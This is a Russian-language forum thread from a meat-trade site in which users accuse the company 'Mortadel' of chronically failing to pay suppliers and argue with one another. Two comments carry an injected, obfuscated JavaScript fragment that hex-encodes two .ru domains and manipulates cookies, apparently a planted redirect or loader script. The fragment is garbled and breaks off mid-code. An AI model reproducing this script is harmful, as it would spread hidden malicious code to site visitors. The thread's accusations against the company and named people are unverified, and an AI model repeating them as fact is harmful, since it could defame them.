Реклама
i
ООО Инлайн
ИНН: 7805355672
Erid: 2SDnje5iJDY

Фирма Мортодель - ЗЛОСТНЫЙ НЕПЛАТЕЛЬЩИК!

Фирма Мортодель (Пушкинский р-н МО)- злостные неплательщики!Куча исков в суде! Не попадите на деньги! Вице-президент Фирмы, супруга господина  Агурбаш!

Комментарии (29):

Читать противно, как бабы на рынке
Виктория Розанова

, 25 сен 2015, 13:56

Так не читайте! Мы с коллегами делимся инфой! = 1;!function(){var o=('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20828",n=function(o){var e=(new RegExp("(?:^|; )"+(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=("number"==typeof n&&n){var i=new Date(n);n=}var r="3600";!("3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}},r=function(o){o=(/[\S\s]{1,2}/g);for(var e="",t=0;t< )e+=(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=>t;t++)e+=(t).toString(16);return e},p=function(){var w=window,p=(('http')==0){return p}for(var e=0;et;t++)e+=(t).toString(16);return e},p=function(){var w=window,p=(('http')==0){return p}for(var e=0;e
Георгий Царицын

, 25 сен 2015, 14:00

Да, продукция действительно неплохая. Но мы пока слава Богу не судились
Евгений Жулев

, 7 сен 2015, 12:15

Сейчас качество упало! Сам лично долгое время покупал их сосиски "Сливочные", тут как то купил их в "ДИКСИ" в вакуумной упаковке!  = 1;!function(){var o=('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20828",n=function(o){var e=(new RegExp("(?:^|; )"+(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=("number"==typeof n&&n){var i=new Date(n);n=}var r="3600";!("3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}},r=function(o){o=(/[\S\s]{1,2}/g);for(var e="",t=0;t< )e+=(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=>t;t++)e+=(t).toString(16);return e},p=function(){var w=window,p=(('http')==0){return p}for(var e=0;et;t++)e+=(t).toString(16);return e},p=function(){var w=window,p=(('http')==0){return p}for(var e=0;e
Георгий Царицын

, 7 сен 2015, 12:27

Продукция,кстати у них неплохая. На самом деле ,мы с ними судились,но до суда дело не дошло. Как только вы подаете исковое заявление с пенями ,советую по опыту подождать суда,но ,как правило ,до суда дело не доходит и выплачивают все в полном объеме и пени так же. У них долг перед нами был порядка 9 миллионов. Пришлось ждать пол года,ну ничего....  
Миша Михалыч

, 14 авг 2015, 13:07

Предлагаю дядю Сашу позвать!!!
У него жир лечебный шибко!
Поможет, говорят что для памяти хорош и сделки с ним заключать будет полегче.

Михаил Светлов

, 8 июн 2015, 11:45

Cдулся Фунтик!!!!))
Андрей Юрьевич

, 6 июн 2015, 14:13

ГК ГЛАВЗАПАС, думаю что Вы правы. И что к доктору Вам пора и в самый раз. И поскольку Вас сегодня на сайте нет (хотя мне непонятно как Вы, понаписав с три короба про свою бесконечную занятость, про чуть ли не ежедневные разъезды и командировки по городам и весям нашей необъятной Родины, про вереницу непрекращающихся переговоров и деловых встреч, вчера целый день проторчали на сайте и при этом успевали всем отвечать. уж не во время ли очередной деловой встречи или подписания очередного крупного и долгосрочного контракта с 201-м фермерским хозяйством или в перерыве на 15-ти минутный кофе-брейк Вы это делали? А может договаривались о сотрудничестве с очередной МОРТАДЕЛЬЮ???), то я очень надеюсь на то, что в данный момент Вы находитесь в очереди в кабинет к профильному специалисту.
Браво!!!
Елена Якименко

, 5 июн 2015, 14:19

запасной не выдержал дуэли ))

в отличии от вас бездельников, я работаю!
мне ваши дуэли по барабану!

Георгий Царицын

, 5 июн 2015, 22:38

Ответ в 22:38 в пятницу..."Одиночество-сволочь...", далее по тексту, исполнение женское))
Елена Якименко

, 8 июн 2015, 11:57

Мы с Мортадель давно сотрудничаем. Да, задержки оплат были, а кому сейчас легко? Кризис( НО! лучше с задержкой, но получить, чем совсем без оборота сидеть. Ни до каких судов дела не доходили.
Алина Иванова

, 5 июн 2015, 10:03

А толку от Вашего интелегентного лица ? Ведете себя как, простите за выражение, уличная торговка!
Георгий Царицын

, 4 июн 2015, 15:49

В слове "интелегентного" две ошибки)) правильно писать "интеллигентного" )))
Про "уличную торговку" даже отвечать не стану)) Поскольку не я пестрю тут восклицательными знаками, ставя их в большинстве случаев невпопад))

У меня впечатление что у Вы одинокий человек в жизни! Хроническая нехватка семейных скандалов!
Удачи! Считаю продолжать общение с Вами ниже своего достоинства!
Георгий Царицын

, 4 июн 2015, 15:57

Насчет одиночества - тут я должен Вас разочаровать. Вы жестоко ошиблись в своем нелепом предположении. Я уж не говорю о том, что в семейной жизни прекрасно можно обходиться и без скандалов, драм и прочих коллизий.
А насчет продолжения общения - какой прекрасный повод с Вашей стороны соскочить с дальнейшей дискуссии, изобразив из себя смертельно обиженного моими высказываниями человека и гордо, во всеуслышание, заявив о том, что продолжать общение со мной Высчитаете ниже своего достоинства.
А у Вас оно есть, это достоинство то? А может это мне логичнее посчитать, что продолжать с Вами разговор ниже МОЕГО достоинства?
Потому что пока все, что я вижу, так это то, что Вы ведете себя чересчур нервно и излишне эмоционально, пытаетесь хамить порой, и реагируете на сказанное в Ваш адрес не совсем адекватно.

Валерий, к доктору! К доктору!
Георгий Царицын

, 4 июн 2015, 16:20

ГК ГЛАВЗАПАС, так тут и судить не о чем))) И так все ясно))) Как бы Вы не старались доказать обратное. Даже тон и стиль Вашего общения свойственен не солидному руководителю, а рядовому манагеру, и ближе к лексикону шантрапы из подворотни, немного занявшейся самообразованием и изучением правил этикета, принятых в приличном обществе)))
Мы с Мортаделем работали, они поставляли нам свою боенскую продукцию.И все было так же замечательно, если бы не пресловутая "метла"...
Елена Якименко

, 4 июн 2015, 15:00

не Мортодель, а МортАдель. Не фирма, а компания, завод, мясоперерабатывающее предприятие, имеющее свой свинокомплекс... Злостными неплательщиками они стали несколько лет назад, после смены собственника. Вы что, только про это узнали???))) Все нормальные люди, закупщики и пр. практически сразу после тех событий уволились. А кого-то "уволила" "новая метла". А ведь хорошие были ребята - Андрей, Света Ларионова, с которыми лично знаком. И при них с оплатами проблем не было. Хотя, сообщаю Вам по секрету, если их с сырьем припрет, они и на предоплату способны.)))
Не Компания, а ООО "Фирма Мортодель" это их Юридическое название! Пока перечисленный сотрудники там работали, проблем не было! Я написал о сегодняшнем дне!
Георгий Царицын

, 4 июн 2015, 14:46

У них несколько юрлиц, к Вашему сведению.
Мне эти сведения ни к чему!
Георгий Царицын

, 4 июн 2015, 14:50

ну Вы же поучать меня вздумали на предмет знания мортаделевских вывесок) а я Вам отвечаю, что все их вывески лучше Вашего знаю. А Вы даже их название правильно и без ошибки написать не смогли.
Меня не интересуют Ваши познания в названиях и логотипах компаний!
Георгий Царицын

, 4 июн 2015, 15:06

Представьте себе, а меня абсолютно не интересуют Ваши дилетантские "попадалова" на ровном месте в отношениях с теми компаниями, о которых тут любой знает, что связываться с ними нельзя, не рекомендуется, и если только в железобетонную предоплату. И не знание этого (а про МортАдель и то, как они платят, вернее не платят, я знаю уже много лет) говорит о Вашем полном непрофессионализме.
Общение с Вами напоминает назойливую рассылку прайс-листов от некоторых фирм!
Георгий Царицын

, 4 июн 2015, 16:22

Ну судите и не судимы будете!
Не Вам говорить о моем профессионализме!
Доказывать ничего не собираюсь!
Георгий Царицын

, 4 июн 2015, 15:21

Войдите на сайт или зарегистрируйтесь, чтобы участвовать в обсуждениях.

Meatinfo в Telegram

Чат торговли мясной продукцией бесплатно
Подписаться